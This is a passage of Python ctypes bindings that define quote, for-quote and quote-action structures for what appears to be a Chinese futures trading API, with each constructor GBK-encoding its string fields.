self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ForQuoteRef:
self.ForQuoteRef = ForQuoteRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class ForQuote(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ForQuoteRef", c_char_Array_13),
("UserID", c_char_Array_16),
("ForQuoteLocalID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("InsertDate", c_char_Array_9),
("InsertTime", c_char_Array_9),
("ForQuoteStatus", c_char),
("FrontID", c_int),
("SessionID", c_int),
("StatusMsg", c_char_Array_81),
("ActiveUserID", c_char_Array_16),
("BrokerForQutoSeq", c_int),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ForQuoteRef=None, UserID=None, ForQuoteLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, InsertDate=None, InsertTime=None, ForQuoteStatus=None, FrontID=None, SessionID=None, StatusMsg=None, ActiveUserID=None, BrokerForQutoSeq=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ForQuoteRef:
self.ForQuoteRef = ForQuoteRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if ForQuoteLocalID:
self.ForQuoteLocalID = ForQuoteLocalID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if InsertDate:
self.InsertDate = InsertDate.encode("GBK")
if InsertTime:
self.InsertTime = InsertTime.encode("GBK")
if ForQuoteStatus:
self.ForQuoteStatus = ForQuoteStatus.encode("GBK")
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if StatusMsg:
self.StatusMsg = StatusMsg.encode("GBK")
if ActiveUserID:
self.ActiveUserID = ActiveUserID.encode("GBK")
if BrokerForQutoSeq:
self.BrokerForQutoSeq = BrokerForQutoSeq
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class QryForQuote(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("InsertTimeStart", c_char_Array_9),
("InsertTimeEnd", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, InsertTimeStart=None, InsertTimeEnd=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InsertTimeStart:
self.InsertTimeStart = InsertTimeStart.encode("GBK")
if InsertTimeEnd:
self.InsertTimeEnd = InsertTimeEnd.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class ExchangeForQuote(Struct):
_fields_ = [
("ForQuoteLocalID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("InsertDate", c_char_Array_9),
("InsertTime", c_char_Array_9),
("ForQuoteStatus", c_char),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, ForQuoteLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, InsertDate=None, InsertTime=None, ForQuoteStatus=None, IPAddress=None, MacAddress=None):
super().__init__()
if ForQuoteLocalID:
self.ForQuoteLocalID = ForQuoteLocalID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if InsertDate:
self.InsertDate = InsertDate.encode("GBK")
if InsertTime:
self.InsertTime = InsertTime.encode("GBK")
if ForQuoteStatus:
self.ForQuoteStatus = ForQuoteStatus.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class QryExchangeForQuote(Struct):
_fields_ = [
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("TraderID", c_char_Array_21),
]
def __init__(self, ParticipantID=None, ClientID=None, ExchangeInstID=None, ExchangeID=None, TraderID=None):
super().__init__()
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
class InputQuote(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("QuoteRef", c_char_Array_13),
("UserID", c_char_Array_16),
("AskPrice", c_double),
("BidPrice", c_double),
("AskVolume", c_int),
("BidVolume", c_int),
("RequestID", c_int),
("BusinessUnit", c_char_Array_21),
("AskOffsetFlag", c_char),
("BidOffsetFlag", c_char),
("AskHedgeFlag", c_char),
("BidHedgeFlag", c_char),
("AskOrderRef", c_char_Array_13),
("BidOrderRef", c_char_Array_13),
("ForQuoteSysID", c_char_Array_21),
("ExchangeID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("ClientID", c_char_Array_11),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, QuoteRef=None, UserID=None, AskPrice=None, BidPrice=None, AskVolume=None, BidVolume=None, RequestID=None, BusinessUnit=None, AskOffsetFlag=None, BidOffsetFlag=None, AskHedgeFlag=None, BidHedgeFlag=None, AskOrderRef=None, BidOrderRef=None, ForQuoteSysID=None, ExchangeID=None, InvestUnitID=None, ClientID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if QuoteRef:
self.QuoteRef = QuoteRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if AskPrice:
self.AskPrice = AskPrice
if BidPrice:
self.BidPrice = BidPrice
if AskVolume:
self.AskVolume = AskVolume
if BidVolume:
self.BidVolume = BidVolume
if RequestID:
self.RequestID = RequestID
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if AskOffsetFlag:
self.AskOffsetFlag = AskOffsetFlag.encode("GBK")
if BidOffsetFlag:
self.BidOffsetFlag = BidOffsetFlag.encode("GBK")
if AskHedgeFlag:
self.AskHedgeFlag = AskHedgeFlag.encode("GBK")
if BidHedgeFlag:
self.BidHedgeFlag = BidHedgeFlag.encode("GBK")
if AskOrderRef:
self.AskOrderRef = AskOrderRef.encode("GBK")
if BidOrderRef:
self.BidOrderRef = BidOrderRef.encode("GBK")
if ForQuoteSysID:
self.ForQuoteSysID = ForQuoteSysID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class InputQuoteAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("QuoteActionRef", c_int),
("QuoteRef", c_char_Array_13),
("RequestID", c_int),
("FrontID", c_int),
("SessionID", c_int),
("ExchangeID", c_char_Array_9),
("QuoteSysID", c_char_Array_21),
("ActionFlag", c_char),
("UserID", c_char_Array_16),
("InstrumentID", c_char_Array_31),
("InvestUnitID", c_char_Array_17),
("ClientID", c_char_Array_11),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, QuoteActionRef=None, QuoteRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, QuoteSysID=None, ActionFlag=None, UserID=None, InstrumentID=None, InvestUnitID=None, ClientID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if QuoteActionRef:
self.QuoteActionRef = QuoteActionRef
if QuoteRef:
self.QuoteRef = QuoteRef.encode("GBK")
if RequestID:
self.RequestID = RequestID
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if QuoteSysID:
self.QuoteSysID = QuoteSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class Quote(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("QuoteRef", c_char_Array_13),
("UserID", c_char_Array_16),
("AskPrice", c_double),
("BidPrice", c_double),
("AskVolume", c_int),
("BidVolume", c_int),
("RequestID", c_int),
("BusinessUnit", c_char_Array_21),
("AskOffsetFlag", c_char),
("BidOffsetFlag", c_char),
("AskHedgeFlag", c_char),
("BidHedgeFlag", c_char),
("QuoteLocalID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("NotifySequence", c_int),
("OrderSubmitStatus", c_char),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("QuoteSysID", c_char_Array_21),
("InsertDate", c_char_Array_9),
("InsertTime", c_char_Array_9),
("CancelTime", c_char_Array_9),
("QuoteStatus", c_char),
("ClearingPartID", c_char_Array_11),
("SequenceNo", c_int),
("AskOrderSysID", c_char_Array_21),
("BidOrderSysID", c_char_Array_21),
("FrontID", c_int),
("SessionID", c_int),
("UserProductInfo", c_char_Array_11),
("StatusMsg", c_char_Array_81),
("ActiveUserID", c_char_Array_16),
("BrokerQuoteSeq", c_int),
("AskOrderRef", c_char_Array_13),
("BidOrderRef", c_char_Array_13),
("ForQuoteSysID", c_char_Array_21),
("BranchID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, QuoteRef=None, UserID=None, AskPrice=None, BidPrice=None, AskVolume=None, BidVolume=None, RequestID=None, BusinessUnit=None, AskOffsetFlag=None, BidOffsetFlag=None, AskHedgeFlag=None, BidHedgeFlag=None, QuoteLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, NotifySequence=None, OrderSubmitStatus=None, TradingDay=None, SettlementID=None, QuoteSysID=None, InsertDate=None, InsertTime=None, CancelTime=None, QuoteStatus=None, ClearingPartID=None, SequenceNo=None, AskOrderSysID=None, BidOrderSysID=None, FrontID=None, SessionID=None, UserProductInfo=None, StatusMsg=None, ActiveUserID=None, BrokerQuoteSeq=None, AskOrderRef=None, BidOrderRef=None, ForQuoteSysID=None, BranchID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if QuoteRef:
self.QuoteRef = QuoteRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if AskPrice:
self.AskPrice = AskPrice
if BidPrice:
self.BidPrice = BidPrice
if AskVolume:
self.AskVolume = AskVolume
if BidVolume:
self.BidVolume = BidVolume
if RequestID:
self.RequestID = RequestID
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if AskOffsetFlag:
self.AskOffsetFlag = AskOffsetFlag.encode("GBK")
if BidOffsetFlag:
self.BidOffsetFlag = BidOffsetFlag.encode("GBK")
if AskHedgeFlag:
self.AskHedgeFlag = AskHedgeFlag.encode("GBK")
if BidHedgeFlag:
self.BidHedgeFlag = BidHedgeFlag.encode("GBK")
if QuoteLocalID:
self.QuoteLocalID = QuoteLocalID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if NotifySequence:
self.NotifySequence = NotifySequence
if OrderSubmitStatus:
self.OrderSubmitStatus = OrderSubmitStatus.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if QuoteSysID:
self.QuoteSysID = QuoteSysID.encode("GBK")
if InsertDate:
self.InsertDate = InsertDate.encode("GBK")
if InsertTime:
self.InsertTime = InsertTime.encode("GBK")
if CancelTime:
self.CancelTime = CancelTime.encode("GBK")
if QuoteStatus:
self.QuoteStatus = QuoteStatus.encode("GBK")
if ClearingPartID:
self.ClearingPartID = ClearingPartID.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if AskOrderSysID:
self.AskOrderSysID = AskOrderSysID.encode("GBK")
if BidOrderSysID:
self.BidOrderSysID = BidOrderSysID.encode("GBK")
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if StatusMsg:
self.StatusMsg = StatusMsg.encode("GBK")
if ActiveUserID:
self.ActiveUserID = ActiveUserID.encode("GBK")
if BrokerQuoteSeq:
self.BrokerQuoteSeq = BrokerQuoteSeq
if AskOrderRef:
self.AskOrderRef = AskOrderRef.encode("GBK")
if BidOrderRef:
self.BidOrderRef = BidOrderRef.encode("GBK")
if ForQuoteSysID:
self.ForQuoteSysID = ForQuoteSysID.encode("GBK")
if BranchID:
self.BranchID = BranchID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class QuoteAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("QuoteActionRef", c_int),
("QuoteRef", c_char_Array_13),
("RequestID", c_int),
("FrontID", c_int),
("SessionID", c_int),
("ExchangeID", c_char_Array_9),
("QuoteSysID", c_char_Array_21),
("ActionFlag", c_char),
("ActionDate", c_char_Array_9),
("ActionTime", c_char_Array_9),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("QuoteLocalID", c_char_Array_13),
("ActionLocalID", c_char_Array_13),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("BusinessUnit", c_char_Array_21),
("OrderActionStatus", c_char),
("UserID", c_char_Array_16),
("StatusMsg", c_char_Array_81),
("InstrumentID", c_char_Array_31),
("BranchID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, QuoteActionRef=None, QuoteRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, QuoteSysID=None, ActionFlag=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, QuoteLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, StatusMsg=None, InstrumentID=None, BranchID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if QuoteActionRef:
self.QuoteActionRef = QuoteActionRef
if QuoteRef:
self.QuoteRef = QuoteRef.encode("GBK")
if RequestID:
self.RequestID = RequestID
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if QuoteSysID:
self.QuoteSysID = QuoteSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if ActionDate:
self.ActionDate = ActionDate.encode("GBK")
if ActionTime:
self.ActionTime = ActionTime.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if QuoteLocalID:
self.QuoteLocalID = QuoteLocalID.encode("GBK")
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OrderActionStatus:
self.OrderActionStatus = OrderActionStatus.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if StatusMsg:
self.StatusMsg = StatusMsg.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if BranchID:
self.BranchID = BranchID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class QryQuote(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("QuoteSysID", c_char_Array_21),
("InsertTimeStart", c_char_Array_9),
("InsertTimeEnd", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, QuoteSysID=None, InsertTimeStart=None, InsertTimeEnd=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if QuoteSysID:
self.QuoteSysID = QuoteSysID.encode("GBK")
if InsertTimeStart:
self.InsertTimeStart = InsertTimeStart.encode("GBK")
if InsertTimeEnd:
self.InsertTimeEnd = InsertTimeEnd.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class ExchangeQuote(Struct):
_fields_ = [
("AskPrice", c_double),
("BidPrice", c_double),
("AskVolume", c_int),
("BidVolume", c_int),
("RequestID", c_int),
("BusinessUnit", c_char_Array_21),
("AskOffsetFlag", c_char),
("BidOffsetFlag", c_char),
("AskHedgeFlag", c_char),
("BidHedgeFlag", c_char),
("QuoteLocalID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("NotifySequence", c_int),
("OrderSubmitStatus", c_char),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("QuoteSysID", c_char_Array_21),
("InsertDate", c_char_Array_9),
("InsertTime", c_char_Array_9),
("CancelTime", c_char_Array_9),
("QuoteStatus", c_char),
("ClearingPartID", c_char_Array_11),
("SequenceNo", c_int),
("AskOrderSysID", c_char_Array_21),
("BidOrderSysID", c_char_Array_21),
("ForQuoteSysID", c_char_Array_21),
("BranchID", c_char_Array_9),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, AskPrice=None, BidPrice=None, AskVolume=None, BidVolume=None, RequestID=None, BusinessUnit=None, AskOffsetFlag=None, BidOffsetFlag=None, AskHedgeFlag=None, BidHedgeFlag=None, QuoteLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, NotifySequence=None, OrderSubmitStatus=None, TradingDay=None, SettlementID=None, QuoteSysID=None, InsertDate=None, InsertTime=None, CancelTime=None, QuoteStatus=None, ClearingPartID=None, SequenceNo=None, AskOrderSysID=None, BidOrderSysID=None, ForQuoteSysID=None, BranchID=None, IPAddress=None, MacAddress=None):
super().__init__()
if AskPrice:
self.AskPrice = AskPrice
if BidPrice:
self.BidPrice = BidPrice
if AskVolume:
self.AskVolume = AskVolume
if BidVolume:
self.BidVolume = BidVolume
if RequestID:
self.RequestID = RequestID
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if AskOffsetFlag:
self.AskOffsetFlag = AskOffsetFlag.encode("GBK")
if BidOffsetFlag:
self.BidOffsetFlag = BidOffsetFlag.encode("GBK")
if AskHedgeFlag:
self.AskHedgeFlag = AskHedgeFlag.encode("GBK")
if BidHedgeFlag:
self.BidHedgeFlag = BidHedgeFlag.encode("GBK")
if QuoteLocalID:
self.QuoteLocalID = QuoteLocalID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if NotifySequence:
self.NotifySequence = NotifySequence
if OrderSubmitStatus:
self.OrderSubmitStatus = OrderSubmitStatus.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if QuoteSysID:
self.QuoteSysID = QuoteSysID.encode("GBK")
if InsertDate:
self.InsertDate = InsertDate.encode("GBK")
if InsertTime:
self.InsertTime = InsertTime.encode("GBK")
if CancelTime:
self.CancelTime = CancelTime.encode("GBK")
if QuoteStatus:
self.QuoteStatus = QuoteStatus.encode("GBK")
if ClearingPartID:
self.ClearingPartID = ClearingPartID.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if AskOrderSysID:
self.AskOrderSysID = AskOrderSysID.encode("GBK")
if BidOrderSysID:
self.BidOrderSysID = BidOrderSysID.encode("GBK")
if ForQuoteSysID:
self.ForQuoteSysID = ForQuoteSysID.encode("GBK")
if BranchID:
self.BranchID = BranchID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class QryExchangeQuote(Struct):
_fields_ = [
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("TraderID", c_char_Array_21),
]
def __init__(self, ParticipantID=None, ClientID=None, ExchangeInstID=None, ExchangeID=None, TraderID=None):
super().__init__()
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
class QryQuoteAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
]
def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class ExchangeQuoteAction(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("QuoteSysID", c_char_Array_21),
("ActionFlag", c_char),
("ActionDate", c_char_Array_9),
("ActionTime", c_char_Array_9),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("QuoteLocalID", c_char_Array_13),
("ActionLocalID", c_char_Array_13),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("BusinessUnit", c_char_Array_21),
("OrderActionStatus", c_char),
("UserID", c_char_Array_16),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, ExchangeID=None, QuoteSysID=None, ActionFlag=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, QuoteLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, IPAddress=None, MacAddress=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if QuoteSysID:
self.QuoteSysID = QuoteSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if ActionDate:
self.ActionDate = ActionDate.encode("GBK")
if ActionTime:
self.ActionTime = ActionTime.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if QuoteLocalID:
self.QuoteLocalID = QuoteLocalID.encode("GBK")
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OrderActionStatus:
self.OrderActionStatus = OrderActionStatus.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class QryExchangeQuoteAction(Struct):
_fields_ = [
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeID", c_char_Array_9),
("TraderID", c_char_Array_21),
]
def __init__(self, ParticipantID=None, ClientID=None, ExchangeID=None, TraderID=None):
super().__init__()
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
class OptionInstrDelta(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("Delta", c_double),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, Delta=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if Delta:
self.Delta = Delta
class ForQuoteRsp(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("InstrumentID", c_char_Array_31),
("ForQuoteSysID", c_char_Array_21),
("ForQuoteTime", c_char_Array_9),
("ActionDay", c_char_Array_9),
("ExchangeID", c_char_Array_9),
]
def __init__(self, TradingDay=None, InstrumentID=None, ForQuoteSysID=None, ForQuoteTime=None, ActionDay=None, ExchangeID=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ForQuoteSysID:
self.ForQuoteSysID = ForQuoteSysID.encode("GBK")
if ForQuoteTime:
self.ForQuoteTime = ForQuoteTime.encode("GBK")
if ActionDay:
self.ActionDay = ActionDay.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class StrikeOffset(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("InvestorRange", c_char),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("Offset", c_double),
("OffsetType", c_char),
]
def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, Offset=None, OffsetType=None):
super().__init__()
